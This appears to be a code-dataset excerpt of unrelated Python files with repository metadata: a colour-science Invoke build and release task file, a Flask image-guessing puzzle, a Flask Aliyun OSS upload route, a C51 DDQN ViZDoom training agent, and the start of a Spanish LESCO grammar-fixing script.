| permissive | njwardhan/colour | 3a4bf7994e25f02e15aa16bc03d35d7f6cc61a50 | 60679360c3990bc549b5f947bfeb621383e18b5e | refs/heads/master | 2022-09-29T06:17:36.380542 | 2020-01-25T05:10:15 | 2020-01-25T05:10:15 | 253,715,920 | 0 | 0 | null | 2020-04-07T07:14:32 | 2020-04-07T07:14:31 | null | UTF-8 | Python | false | false | 13,629 | py | # -*- coding: utf-8 -*-
"""
Invoke - Tasks
==============
"""
from __future__ import unicode_literals
import sys
try:
import biblib.bib
except ImportError:
pass
import fnmatch
import os
import re
import toml
import uuid
from invoke import task
import colour
from colour.utilities import message_box
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2020 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '[email protected]'
__status__ = 'Production'
__all__ = [
'APPLICATION_NAME', 'APPLICATION_VERSION', 'PYTHON_PACKAGE_NAME',
'PYPI_PACKAGE_NAME', 'BIBLIOGRAPHY_NAME', 'clean', 'formatting', 'tests',
'quality', 'examples', 'preflight', 'docs', 'todo', 'requirements',
'build', 'virtualise', 'tag', 'release', 'sha256'
]
APPLICATION_NAME = colour.__application_name__
APPLICATION_VERSION = colour.__version__
PYTHON_PACKAGE_NAME = colour.__name__
PYPI_PACKAGE_NAME = 'colour-science'
BIBLIOGRAPHY_NAME = 'BIBLIOGRAPHY.bib'
@task
def clean(ctx, docs=True, bytecode=False):
"""
Cleans the project.
Parameters
----------
ctx : invoke.context.Context
Context.
docs : bool, optional
Whether to clean the *docs* directory.
bytecode : bool, optional
Whether to clean the bytecode files, e.g. *.pyc* files.
Returns
-------
bool
Task success.
"""
message_box('Cleaning project...')
patterns = ['build', '*.egg-info', 'dist']
if docs:
patterns.append('docs/_build')
patterns.append('docs/generated')
if bytecode:
patterns.append('**/*.pyc')
for pattern in patterns:
ctx.run("rm -rf {}".format(pattern))
@task
def formatting(ctx, yapf=False, asciify=True, bibtex=True):
"""
Formats the codebase with *Yapf*, converts unicode characters to ASCII and
cleanup the "BibTeX" file.
Parameters
----------
ctx : invoke.context.Context
Context.
yapf : bool, optional
Whether to format the codebase with *Yapf*.
asciify : bool, optional
Whether to convert unicode characters to ASCII.
bibtex : bool, optional
Whether to cleanup the *BibTeX* file.
Returns
-------
bool
Task success.
"""
if yapf:
message_box('Formatting codebase with "Yapf"...')
ctx.run('yapf -p -i -r --exclude \'.git\' .')
if asciify:
message_box('Converting unicode characters to ASCII...')
with ctx.cd('utilities'):
ctx.run('./unicode_to_ascii.py')
if bibtex and sys.version_info[:2] >= (3, 2):
message_box('Cleaning up "BibTeX" file...')
bibtex_path = BIBLIOGRAPHY_NAME
with open(bibtex_path) as bibtex_file:
bibtex = biblib.bib.Parser().parse(
bibtex_file.read()).get_entries()
for entry in sorted(bibtex.values(), key=lambda x: x.key):
try:
del entry['file']
except KeyError:
pass
for key, value in entry.items():
entry[key] = re.sub('(?<!\\\\)\\&', '\\&', value)
with open(bibtex_path, 'w') as bibtex_file:
for entry in bibtex.values():
bibtex_file.write(entry.to_bib())
bibtex_file.write('\n')
@task
def tests(ctx, nose=True):
"""
Runs the unit tests with *Nose* or *Pytest*.
Parameters
----------
ctx : invoke.context.Context
Context.
nose : bool, optional
Whether to use *Nose* or *Pytest*.
Returns
-------
bool
Task success.
"""
if nose:
message_box('Running "Nosetests"...')
ctx.run(
'nosetests --with-doctest --with-coverage --cover-package={0} {0}'.
format(PYTHON_PACKAGE_NAME),
env={'MPLBACKEND': 'AGG'})
else:
message_box('Running "Pytest"...')
ctx.run(
'py.test --disable-warnings --doctest-modules '
'--ignore={0}/examples {0}'.format(PYTHON_PACKAGE_NAME),
env={'MPLBACKEND': 'AGG'})
@task
def quality(ctx, flake8=True, rstlint=True):
"""
Checks the codebase with *Flake8* and lints various *restructuredText*
files with *rst-lint*.
Parameters
----------
ctx : invoke.context.Context
Context.
flake8 : bool, optional
Whether to check the codebase with *Flake8*.
rstlint : bool, optional
Whether to lint various *restructuredText* files with *rst-lint*.
Returns
-------
bool
Task success.
"""
if flake8:
message_box('Checking codebase with "Flake8"...')
ctx.run('flake8 {0} --exclude=examples'.format(PYTHON_PACKAGE_NAME))
if rstlint:
message_box('Linting "README.rst" file...')
ctx.run('rst-lint README.rst')
@task
def examples(ctx, plots=False):
"""
Runs the examples.
Parameters
----------
ctx : invoke.context.Context
Context.
plots : bool, optional
Whether to skip or only run the plotting examples: This a mutually
exclusive switch.
Returns
-------
bool
Task success.
"""
message_box('Running examples...')
for root, _dirnames, filenames in os.walk(
os.path.join(PYTHON_PACKAGE_NAME, 'examples')):
for filename in fnmatch.filter(filenames, '*.py'):
if not plots and ('plotting' in root or
'examples_interpolation' in filename or
'examples_contrast' in filename):
continue
if plots and ('plotting' not in root and
'examples_interpolation' not in filename and
'examples_contrast' not in filename):
continue
ctx.run('python {0}'.format(os.path.join(root, filename)))
@task(formatting, tests, quality, examples)
def preflight(ctx):
"""
Performs the preflight tasks, i.e. *formatting*, *tests*, *quality*, and
*examples*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Finishing "Preflight"...')
@task
def docs(ctx, plots=True, html=True, pdf=True):
"""
Builds the documentation.
Parameters
----------
ctx : invoke.context.Context
Context.
plots : bool, optional
Whether to generate the documentation plots.
html : bool, optional
Whether to build the *HTML* documentation.
pdf : bool, optional
Whether to build the *PDF* documentation.
Returns
-------
bool
Task success.
"""
if plots:
with ctx.cd('utilities'):
message_box('Generating plots...')
ctx.run('./generate_plots.py')
with ctx.prefix('export COLOUR_SCIENCE_DOCUMENTATION_BUILD=True'):
with ctx.cd('docs'):
if html:
message_box('Building "HTML" documentation...')
ctx.run('make html')
if pdf:
message_box('Building "PDF" documentation...')
ctx.run('make latexpdf')
@task
def todo(ctx):
"""
Export the TODO items.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Exporting "TODO" items...')
with ctx.cd('utilities'):
ctx.run('./export_todo.py')
@task
def requirements(ctx):
"""
Export the *requirements.txt* file.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Exporting "requirements.txt" file...')
ctx.run('poetry run pip freeze | '
'egrep -v "github.com/colour-science|enum34" '
'> requirements.txt')
@task(clean, preflight, docs, todo, requirements)
def build(ctx):
"""
Builds the project and runs dependency tasks, i.e. *docs*, *todo*, and
*preflight*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Building...')
pyproject_content = toml.load('pyproject.toml')
pyproject_content['tool']['poetry']['name'] = PYPI_PACKAGE_NAME
pyproject_content['tool']['poetry']['packages'] = [{
'include': PYTHON_PACKAGE_NAME,
'from': '.'
}]
with open('pyproject.toml', 'w') as pyproject_file:
toml.dump(pyproject_content, pyproject_file)
ctx.run('poetry build')
ctx.run('git checkout -- pyproject.toml')
with ctx.cd('dist'):
ctx.run('tar -xvf {0}-{1}.tar.gz'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('cp {0}-{1}/setup.py ../'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('rm -rf {0}-{1}'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
with open('setup.py') as setup_file:
source = setup_file.read()
setup_kwargs = []
def sub_callable(match):
setup_kwargs.append(match)
return ''
template = """
setup({0}
)
"""
source = re.sub(
'setup_kwargs = {(.*)}.*setup\\(\\*\\*setup_kwargs\\)',
sub_callable,
source,
flags=re.DOTALL)[:-2]
setup_kwargs = setup_kwargs[0].group(1).splitlines()
for i, line in enumerate(setup_kwargs):
setup_kwargs[i] = re.sub('^\\s*(\'(\\w+)\':\\s?)', ' \\2=', line)
if setup_kwargs[i].strip().startswith('long_description'):
setup_kwargs[i] = (
' long_description=open(\'README.rst\').read(),')
source += template.format('\n'.join(setup_kwargs))
with open('setup.py', 'w') as setup_file:
setup_file.write(source)
@task
def virtualise(ctx, tests=True):
"""
Create a virtual environment for the project build.
Parameters
----------
ctx : invoke.context.Context
Context.
tests : bool, optional
Whether to run tests on the virtual environment.
Returns
-------
bool
Task success.
"""
unique_name = '{0}-{1}'.format(PYPI_PACKAGE_NAME, uuid.uuid1())
with ctx.cd('dist'):
ctx.run('tar -xvf {0}-{1}.tar.gz'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('mv {0}-{1} {2}'.format(PYPI_PACKAGE_NAME, APPLICATION_VERSION,
unique_name))
with ctx.cd(unique_name):
ctx.run('poetry env use 3')
ctx.run('poetry install --extras "optional plotting"')
ctx.run('source $(poetry env info -p)/bin/activate')
ctx.run('python -c "import imageio;'
'imageio.plugins.freeimage.download()"')
if tests:
ctx.run('poetry run nosetests', env={'MPLBACKEND': 'AGG'})
@task
def tag(ctx):
"""
Tags the repository according to defined version using *git-flow*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Tagging...')
result = ctx.run('git rev-parse --abbrev-ref HEAD', hide='both')
assert result.stdout.strip() == 'develop', (
'Are you still on a feature or master branch?')
with open(os.path.join(PYTHON_PACKAGE_NAME, '__init__.py')) as file_handle:
file_content = file_handle.read()
major_version = re.search("__major_version__\\s+=\\s+'(.*)'",
file_content).group(1)
minor_version = re.search("__minor_version__\\s+=\\s+'(.*)'",
file_content).group(1)
change_version = re.search("__change_version__\\s+=\\s+'(.*)'",
file_content).group(1)
version = '.'.join((major_version, minor_version, change_version))
result = ctx.run('git ls-remote --tags upstream', hide='both')
remote_tags = result.stdout.strip().split('\n')
tags = set()
for remote_tag in remote_tags:
tags.add(
remote_tag.split('refs/tags/')[1].replace('refs/tags/', '^{}'))
tags = sorted(list(tags))
assert 'v{0}'.format(version) not in tags, (
'A "{0}" "v{1}" tag already exists in remote repository!'.format(
PYTHON_PACKAGE_NAME, version))
ctx.run('git flow release start v{0}'.format(version))
ctx.run('git flow release finish v{0}'.format(version))
@task(clean, build)
def release(ctx):
"""
Releases the project to *Pypi* with *Twine*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Releasing...')
with ctx.cd('dist'):
ctx.run('twine upload *.tar.gz')
ctx.run('twine upload *.whl')
@task
def sha256(ctx):
"""
Computes the project *Pypi* package *sha256* with *OpenSSL*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Computing "sha256"...')
with ctx.cd('dist'):
ctx.run('openssl sha256 {0}-*.tar.gz'.format(PYPI_PACKAGE_NAME))
| [
"[email protected]"
]
| |
b7e02524df176839009c27ff8e612e57db07bef9 | 13f03eb35aeb306e0a33d67437993f849d5b0e8d | /CS110 Intro to Python/Project 2/project2 no extra credit.py | da45097dc3486773e6bfa601825fd80804437b4e | []
| no_license | jalague/Projects | cee07f49e41a33e9529317b6beace2bb7b56e1c6 | 5e1a15cdf10ff8f878474011a04868b15334aad5 | refs/heads/master | 2021-01-12T08:28:13.707957 | 2019-12-03T01:23:32 | 2019-12-03T01:23:32 | 76,586,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,488 | py | import flask
import PIL
from flask import request
from flask import redirect
from imageHelperFunctions import *
import os, os.path
app=flask.Flask(__name__)
def editImage(option,filename,newname):
im=openImageFile(filename)
w,h=size(im)
for i in range(0,h):
for j in range(0,w):
r,g,b= getPixel((j,i),im)
if option==1:
setPixel((j,i),im, (r*20,0,0))
elif option==2:
setPixel((j,i),im, (0,g*20,0))
elif option==3:
setPixel((j,i),im, (0,0,b*20))
#showImage(im)
saveImageFile(im,newname,"PNG")
@app.route('/')
def displayPuzzle():
print("In displayPuzzle")
if not os.path.exists('static/newimage1.png'):
editImage(1,"static/distortedImage1.png", "static/newimage1.png")
if not os.path.exists('static/newimage2.png'):
editImage(2,"static/distortedImage1.png", "static/newimage2.png")
if not os.path.exists('static/newimage3.png'):
editImage(3,"static/distortedImage1.png", "static/newimage3.png")
html=''
html+='<!DOCTYPE html>\n'
html+='<html>\n'
html+='<body>\n'
html+=" <h1>Image Puzzle</h1>\n"
html+=' <p1> Apply one of the operations below to the image, and see if you can guess what famous object is in the image! </p1>\n'
html+='<img src="/static/distortedImage1.png" alt="distortedImage1"style="width:1024px;height:683px" >\n'
html+='<br>\n'
html+='Pick an Operation:<br>\n'
html+='<form method="POST" action="/showimage">\n'
html+='<input type="radio" name="operation" value="red">Set blue and green pixels to 0 and multiple red ones by 20<br>\n'
html+='<input type="radio" name="operation" value="green">Set blue and red pixels to 0 and multiple green ones by 20<br>\n'
html+='<input type="radio" name="operation" value="blue">Set blue and green pixels to 0 and multiple red ones by 20<br>\n'
html+='<input type="submit" value="Apply Operations" />\n'
html+='</form>\n'
html+='</form>\n'
html+='</body>\n'
html+='</html>\n'
return html
@app.route("/showimage", methods=['POST'])
def showEditedimage():
html=''
html+='<!DOCTYPE html>\n'
html+='<html>\n'
html+='<body>\n'
operation=request.form["operation"]
if operation=="red":
html+='<img src="/static/newimage1.png" alt="newimage" style="width:1024px;height:683px" >\n'
elif operation=="green":
html+='<img src="/static/newimage2.png" alt="newimage" style="width:1024px;height:683px" >\n'
elif operation=="blue":
html+='<img src="/static/newimage3.png" alt="newimage" style="width:1024px;height:683px" >\n'
html+='<br>\n'
html += '<form method="POST" action="/guessImage">\n'
html += 'Enter your guess <input type="text" name="guess"/>\n'
html += '</form>\n'
html+='</form>\n'
html+='</body>\n'
html+='</html>\n'
return html
@app.route("/guessImage", methods=['POST'])
def guessImage():
guess=request.form["guess"]
if guess=="White House" or guess=="white house" or guess=="the white house" or guess=="The White House" or guess=="the White House":
return "Correct!"
else:
return redirect('/')
if __name__ == '__main__':
app.run()
| [
"[email protected]"
]
| |
ce17d3e628bbb39aa428a1fe21da1b9f4d08ce1d | 9f3365f168dc94f8009f6586a58dc536b2af6921 | /controller/oss.py | 9a8cb7996f6e745ce6d81f7397212f9de6da0a71 | []
| no_license | qmaxlambda/backend | 80d9ad8999431c4357e5a20e110c250f8809552e | 6f2a8ad9daff03499699d146015dc9f15a7f5448 | refs/heads/master | 2023-01-23T05:54:41.503490 | 2020-12-11T03:57:28 | 2020-12-11T03:57:28 | 311,026,480 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | # -*- coding: utf-8 -*-
# @Time : 2020/11/8 下午 04:59
# @Author : Mason
# @Email : [email protected]
# @File : oss.py
# @Software: PyCharm
import json
import os
import oss2
from flask import request, Blueprint
from Config import config
from util.jsons import js_ret
oss_bp = Blueprint('oss',__name__)
access_key_id = os.getenv('OSS_TEST_ACCESS_KEY_ID', config.ACCESSKEY_ID)
access_key_secret = os.getenv('OSS_TEST_ACCESS_KEY_SECRET', config.ACCESSKEY_SCRECT)
bucket_name = os.getenv('OSS_TEST_BUCKET', config.BUCKET_NAME)
endpoint = os.getenv('OSS_TEST_ENDPOINT', config.ENDPOINT)
# 确认参数
for param in (access_key_id, access_key_secret, bucket_name, endpoint):
assert '<' not in param, '请设置参数:' + param
# 创建Bucket对象
bucket = oss2.Bucket(oss2.Auth(access_key_id, access_key_secret), endpoint, bucket_name)
@oss_bp.route('/update',methods=["GET", "POST"])
def update():
# 上传文件到服务器
file = request.files.get('file')
if file is None:
return js_ret(0,'没有检索到文件')
else:
# 上传文件到阿里云OSS
res = bucket.put_object(file.filename, file)
if res.status == 200:
# 上传成功,获取文件带签名的地址,返回给前端
url = bucket.sign_url('GET', file.filename, 60)
data = {
"url":url
}
return js_ret(1,"",data)
| [
"[email protected]"
]
| |
140b356fa408e4eb413cb2c100895ff01e14c112 | 264cbdc7c2b4091179ba5fbdbb15005f6ac58b9f | /Algos/C51/examples/python/c51_ddqn.py | bb6455d9b4ae5b306ac48462cd633e024bd33c62 | []
| no_license | geeko66/PA2018-2019-KA | e25b49dd71ad4b5b2f3a00624147a9b24151c3d8 | 186d127608c8ea754a6e64836b0347d32cf37da6 | refs/heads/master | 2020-04-15T21:46:42.503444 | 2019-01-16T11:12:12 | 2019-01-16T11:12:12 | 165,046,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,185 | py | #!/usr/bin/env python
from __future__ import print_function
import skimage as skimage
from skimage import transform, color, exposure
from skimage.viewer import ImageViewer
import random
from random import choice
import numpy as np
from collections import deque
import time
import math
import pickle
import json
from keras.models import model_from_json
from keras.models import Sequential, load_model, Model
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, Dense, Flatten, merge, MaxPooling2D, Input, AveragePooling2D, Lambda, Merge, Activation, Embedding
from keras.optimizers import SGD, Adam, rmsprop
from keras import backend as K
from keras.utils import np_utils
from vizdoom import DoomGame, ScreenResolution
from vizdoom import *
import itertools as it
from time import sleep
import tensorflow as tf
from networks import Networks
import sys
# Not needed for the bonseyes's project
def preprocessImg(img, size):
img = np.rollaxis(img, 0, 3) # It becomes (640, 480, 3)
img = skimage.transform.resize(img,size)
img = skimage.color.rgb2gray(img)
return img
class C51Agent:
def __init__(self, state_size, action_size, num_atoms):
# get size of state and action
self.state_size = state_size
self.action_size = action_size
# these is hyper parameters for the DQN
self.gamma = 0.99
self.learning_rate = 0.0001
self.epsilon = 1.0
self.initial_epsilon = 1.0
self.final_epsilon = 0.0001
self.batch_size = 32
self.observe = 2000
self.explore = 50000
self.frame_per_action = 4
self.update_target_freq = 3000
self.timestep_per_train = 100 # Number of timesteps between training interval
# Initialize Atoms
self.num_atoms = num_atoms # 51 for C51
self.v_max = 30 # Max possible score for Defend the center is 26 - 0.1*26 = 23.4
self.v_min = -10 # -0.1*26 - 1 = -3.6
self.delta_z = (self.v_max - self.v_min) / float(self.num_atoms - 1)
self.z = [self.v_min + i * self.delta_z for i in range(self.num_atoms)]
# Create replay memory using deque
self.memory = deque()
self.max_memory = 50000 # number of previous transitions to remember
# Models for value distribution
self.model = None
self.target_model = None
# Performance Statistics
self.stats_window_size= 50 # window size for computing rolling statistics
self.mavg_score = [] # Moving Average of Survival Time
self.var_score = [] # Variance of Survival Time
self.mavg_ammo_left = [] # Moving Average of Ammo used
self.mavg_kill_counts = [] # Moving Average of Kill Counts
def update_target_model(self):
"""
After some time interval update the target model to be same with model
"""
self.target_model.set_weights(self.model.get_weights())
def get_action(self, state):
"""
Get action from model using epsilon-greedy policy
"""
if np.random.rand() <= self.epsilon:
#print("----------Random Action----------")
action_idx = random.randrange(self.action_size)
else:
action_idx = self.get_optimal_action(state)
return action_idx
def get_optimal_action(self, state):
"""Get optimal action for a state
"""
z = self.model.predict(state) # Return a list [1x51, 1x51, 1x51]
z_concat = np.vstack(z)
q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1)
# Pick action with the biggest Q value
action_idx = np.argmax(q)
return action_idx
def shape_reward(self, r_t, misc, prev_misc, t):
"""
Reward design:
Will be the inverted time in Bonseyes (x = -x) because
the time is the thing we want to minimize, therrefore we
maximize the invert time
"""
# Check any kill count
if misc[0] > prev_misc[0]:
r_t = r_t + 1
if misc[1] < prev_misc[1]: # Use ammo
r_t = r_t - 0.1
if misc[2] < prev_misc[2]: # Loss HEALTH
r_t = r_t - 0.1
return r_t
# save sample <s,a,r,s'> to the replay memory
def replay_memory(self, s_t, action_idx, r_t, s_t1, is_terminated, t):
"""
Used for the replay experience
"""
self.memory.append((s_t, action_idx, r_t, s_t1, is_terminated))
if self.epsilon > self.final_epsilon and t > self.observe:
self.epsilon -= (self.initial_epsilon - self.final_epsilon) / self.explore
if len(self.memory) > self.max_memory:
self.memory.popleft()
# Update the target model to be same with model
if t % self.update_target_freq == 0:
self.update_target_model()
# pick samples randomly from replay memory (with batch_size)
def train_replay(self):
"""
Notes: Update this part to prioritize the experience replay
following the other code. To see!!!
"""
num_samples = min(self.batch_size * self.timestep_per_train, len(self.memory))
replay_samples = random.sample(self.memory, num_samples)
state_inputs = np.zeros(((num_samples,) + self.state_size))
next_states = np.zeros(((num_samples,) + self.state_size))
m_prob = [np.zeros((num_samples, self.num_atoms)) for i in range(action_size)]
action, reward, done = [], [], []
for i in range(num_samples):
state_inputs[i,:,:,:] = replay_samples[i][0]
action.append(replay_samples[i][1])
reward.append(replay_samples[i][2])
next_states[i,:,:,:] = replay_samples[i][3]
done.append(replay_samples[i][4])
z = self.model.predict(next_states) # Return a list [32x51, 32x51, 32x51]
z_ = self.target_model.predict(next_states) # Return a list [32x51, 32x51, 32x51]
# Get Optimal Actions for the next states (from distribution z)
optimal_action_idxs = []
z_concat = np.vstack(z)
q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1) # length (num_atoms x num_actions)
q = q.reshape((num_samples, action_size), order='F')
optimal_action_idxs = np.argmax(q, axis=1)
# Project Next State Value Distribution (of optimal action) to Current State
for i in range(num_samples):
if done[i]: # Terminal State
# Distribution collapses to a single point
Tz = min(self.v_max, max(self.v_min, reward[i]))
bj = (Tz - self.v_min) / self.delta_z
m_l, m_u = math.floor(bj), math.ceil(bj)
m_prob[action[i]][i][int(m_l)] += (m_u - bj)
m_prob[action[i]][i][int(m_u)] += (bj - m_l)
else:
for j in range(self.num_atoms):
Tz = min(self.v_max, max(self.v_min, reward[i] + self.gamma * self.z[j]))
bj = (Tz - self.v_min) / self.delta_z
m_l, m_u = math.floor(bj), math.ceil(bj)
m_prob[action[i]][i][int(m_l)] += z_[optimal_action_idxs[i]][i][j] * (m_u - bj)
m_prob[action[i]][i][int(m_u)] += z_[optimal_action_idxs[i]][i][j] * (bj - m_l)
loss = self.model.fit(state_inputs, m_prob, batch_size=self.batch_size, epochs=1, verbose=0)
return loss.history['loss']
# load the saved model
def load_model(self, name):
self.model.load_weights(name)
# save the model which is under training
def save_model(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
print("System path")
print(sys.path)
# Avoid Tensorflow eats up GPU memory
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
K.set_session(sess)
game = DoomGame()
# game.load_config("..\..\scenarios\defend_the_center.cfg")
game.load_config("/Users/tesla/Downloads/ViZDoom-master/scenarios/defend_the_center.cfg")
game.set_sound_enabled(True)
game.set_screen_resolution(ScreenResolution.RES_640X480)
game.set_window_visible(False)
game.set_mode(Mode.PLAYER)
game.init()
game.new_episode("./episode_rec/ep1.lmp")
game_state = game.get_state()
misc = game_state.game_variables # [KILLCOUNT, AMMO, HEALTH]
prev_misc = misc
action_size = game.get_available_buttons_size()
img_rows , img_cols = 64, 64
# Convert image into Black and white
img_channels = 4 # We stack 4 frames
# C51
num_atoms = 51
state_size = (img_rows, img_cols, img_channels)
agent = C51Agent(state_size, action_size, num_atoms)
agent.model = Networks.value_distribution_network(state_size, num_atoms, action_size, agent.learning_rate)
agent.target_model = Networks.value_distribution_network(state_size, num_atoms, action_size, agent.learning_rate)
x_t = game_state.screen_buffer # 480 x 640
x_t = preprocessImg(x_t, size=(img_rows, img_cols))
s_t = np.stack(([x_t]*4), axis=2) # It becomes 64x64x4
s_t = np.expand_dims(s_t, axis=0) # 1x64x64x4
is_terminated = game.is_episode_finished()
# Start training
epsilon = agent.initial_epsilon
GAME = 0
t = 0
max_life = 0 # Maximum episode life (Proxy for agent performance)
life = 0
# Buffer to compute rolling statistics
tot_reward_buffer, life_buffer, ammo_buffer, kills_buffer, mavg_score, \
var_score, mavg_ammo_left, mavg_kill_counts, \
mavg_tot_rewards = [], [], [], [], [], [], [], [], []
losses_buffer, epsilon_buffer, stats_store = [], [], []
episode_co = 1
while not game.is_episode_finished():
loss = 0
r_t = 0
a_t = np.zeros([action_size])
# Epsilon Greedy
action_idx = agent.get_action(s_t)
a_t[action_idx] = 1
a_t = a_t.astype(int)
game.set_action(a_t.tolist())
skiprate = agent.frame_per_action
game.advance_action(skiprate)
game_state = game.get_state() # Observe again after we take the action
is_terminated = game.is_episode_finished()
r_t = game.get_last_reward() #each frame we get reward of 0.1, so 4 frames will be 0.4
if (is_terminated):
if (life > max_life):
max_life = life
GAME += 1
life_buffer.append(life)
ammo_buffer.append(misc[1])
kills_buffer.append(misc[0])
print("Episode Finish ", misc)
game.new_episode("./episode_rec/ep" + str(episode_co) + "_rec.lmp")
episode_co += 1
game_state = game.get_state()
misc = game_state.game_variables
x_t1 = game_state.screen_buffer
x_t1 = game_state.screen_buffer
misc = game_state.game_variables
x_t1 = preprocessImg(x_t1, size=(img_rows, img_cols))
x_t1 = np.reshape(x_t1, (1, img_rows, img_cols, 1))
s_t1 = np.append(x_t1, s_t[:, :, :, :3], axis=3)
r_t = agent.shape_reward(r_t, misc, prev_misc, t)
if (is_terminated):
life = 0
else:
life += 1
#update the cache
prev_misc = misc
# save the sample <s, a, r, s'> to the replay memory and decrease epsilon
agent.replay_memory(s_t, action_idx, r_t, s_t1, is_terminated, t)
# Do the training
if t > agent.observe and t % agent.timestep_per_train == 0:
loss = agent.train_replay()
losses_buffer.append({'loss': loss, 'episode': GAME})
s_t = s_t1
t += 1
# save progress every 10000 iterations
if t % 10000 == 0:
print("Now we save model")
agent.model.save_weights("./models/c51_ddqn.h5", overwrite=True)
# print info
state = ""
if t <= agent.observe:
state = "observe"
elif t > agent.observe and t <= agent.observe + agent.explore:
state = "explore"
else:
state = "train"
if is_terminated:
print("TIME", t, "/ GAME", GAME, "/ STATE", state, \
"/ EPSILON", agent.epsilon, "/ ACTION", action_idx, "/ REWARD", r_t, \
"/ LIFE", max_life, "/ LOSS", loss)
epsilon_buffer.append(agent.epsilon)
tot_reward_buffer.append(r_t)
# Save Agent's Performance Statistics
if GAME % agent.stats_window_size == 0 and t > agent.observe:
print("Update Rolling Statistics")
agent.mavg_score.append(np.mean(np.array(life_buffer)))
agent.var_score.append(np.var(np.array(life_buffer)))
agent.mavg_ammo_left.append(np.mean(np.array(ammo_buffer)))
agent.mavg_kill_counts.append(np.mean(np.array(kills_buffer)))
mavg_tot_rewards.append(np.mean(np.array(tot_reward_buffer)))
# Reset rolling stats buffer
life_buffer, ammo_buffer, kills_buffer = [], [], []
# Write Rolling Statistics to file
with open("./c51_ddqn_stats.txt", "w") as stats_file:
stats_file.write('Game: ' + str(GAME) + '\n')
stats_file.write('Max Score: ' + str(max_life) + '\n')
stats_file.write('mavg_score: ' + str(agent.mavg_score) + '\n')
stats_file.write('var_score: ' + str(agent.var_score) + '\n')
stats_file.write('mavg_ammo_left: ' + str(agent.mavg_ammo_left) + '\n')
stats_file.write('mavg_kill_counts: ' + str(agent.mavg_kill_counts) + '\n')
stats_file.write('mavg_rewards: ' + str(mavg_tot_rewards) + "\n")
with open("./ddqn_pr_steps_stats" + str(GAME) + ".pickle",
'wb') as handle:
pickle.dump(stats_store.append(
{'game': GAME, 'max_score': max_life,
'mavg_score': agent.mavg_score,
'var_score': agent.var_score,
'mavg_ammo_left': agent.mavg_ammo_left,
'mavg_kill_counts': agent.mavg_kill_counts,
'mavg_tot_rewards': mavg_tot_rewards}), handle,
protocol=pickle.HIGHEST_PROTOCOL)
with open("./buffer_dic_data" + str(GAME) + ".pickle", 'wb') as handle:
pickle.dump(stats_store.append({'life_buffer': life_buffer,
'ammo_buffer': ammo_buffer,
'kills_buffer': kills_buffer,
'tot_reward_buffer': tot_reward_buffer,
'losses': losses_buffer,
'epsilon': epsilon_buffer}),
handle, protocol=pickle.HIGHEST_PROTOCOL) | [
"[email protected]"
]
| |
aca6cfcb482c568e01a5e582aa8c9f728f17fa4b | 3075d466d4482281fbff51bd71dd4e1c11aae7ee | /src/SintacticoSemantico.py | 479ef6f0bcba71872a8f84740609e1c6f2f1c522 | []
| no_license | AndresRQ27/LESCO-Translator | 97c68f6a74826ac8bda8f2a768856f88e87733dc | 50f487fca45e9a1f7e5697224ba72ace79d65802 | refs/heads/master | 2020-03-07T03:36:28.543380 | 2018-10-20T16:24:26 | 2018-10-20T16:24:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,606 | py | # coding=utf-8
def semantico(lista):
palabras = sintactico(lista)
t = pronombre(palabras)
r = pregunta(palabras[0])
palabras[0] = palabras[0][0].upper()+palabras[0][1:]
v = posVerb(palabras)
if(palabras != ""):
if(r[0]):
palabras[0] = "¿"+palabras[0]
if(t[0]):
palabras[v] = fixVerb(t[1],palabras)
else:
palabras[1] = fixVerb("usted", palabras)
palabras[len(palabras)-1] = palabras[len(palabras)-1]+"?"
print str(palabras)
return palabras
elif(t[0]):
if(t[0]):
if(palabras[t[2]+1]!=""):
palabras[t[2]] = t[1]
palabras[v] = fixVerb(t[1], palabras)
else:
print("no hay verbo")
print str(palabras)
return palabras
else:
print str(palabras)
return palabras
def posVerb(palabras):
verb = ["ser","estar","ir","venir","tener","hacer","decir","comer", "llamar", "cumplir", ""]
n = -1
for x in range(0,len(palabras)):
for y in verb:
if(palabras[x]==y):
n = x
return n
def pronombre(palabras):
exc = ["yo", "usted", "ustedes", "nosotros", "ellos","él", "ella"]
x = False
y = ""
n = 0
for e in exc:
for w in range(len(palabras)):
if(e == palabras[w]):
if(palabras[w+1]=="nombre"):
if(e=="yo"):
e = "mi"
elif(e=="usted"):
e = "su"
else:
e = "sus"
x = True
y = e
n = w
print(y)
return [x,y,n]
def pregunta(palabra):
preg = ["donde","cual","que","como","cuando","porque"]
t = False
w = ""
for x in preg:
if(x == palabra):
t = True
w = x
print(x)
return [t,w]
def fixVerb(pron, palabras):
verb = ["ser","estar","ir","venir","tener","hacer","decir","llamar","cumplir", ""]
conjY = ["soy", "estoy", "voy","vengo","tengo", "hago", "digo","llamo","cumplo"]
conjEEU = ["es", "está", "va","viene","tiene", "hace", "dice","llama", "cumple"]
conUs = ["son", "están", "van","vienen", "tienen", "hacen", "dicen","llaman", "cumplen"]
